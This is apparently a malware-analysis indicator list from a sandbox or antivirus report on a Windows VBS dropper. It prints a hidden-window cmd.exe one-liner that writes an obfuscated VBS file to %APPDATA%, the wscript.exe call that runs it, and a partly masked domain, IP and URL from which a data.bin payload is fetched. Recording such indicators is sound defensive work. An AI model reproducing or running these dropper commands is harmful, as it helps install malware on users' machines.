Technical Information
- '<SYSTEM32>\cmd.exe' /V /C set "O0=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM Fa" "suB Dk()" "BSzsEib=10" "CG4=96614644" "RBI=28" "For W5StYbb=1 tO CG4" "De=De+1" "NeXT" "TbFbZ=75" "If De=CG4 thEN" "N1Wla=5" "W3b(...
- %APPDATA%\13208.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\13208.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "O0=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM Fa" "suB Dk()" "BSzsEib=10" "CG4=96614644" "RBI=28" "For W5StYbb=1 tO CG4" "De=De+1" "NeXT" "TbFbZ=75" "If De=CG4 thEN" "N1Wla=5" "W3b(...' (with hidden window)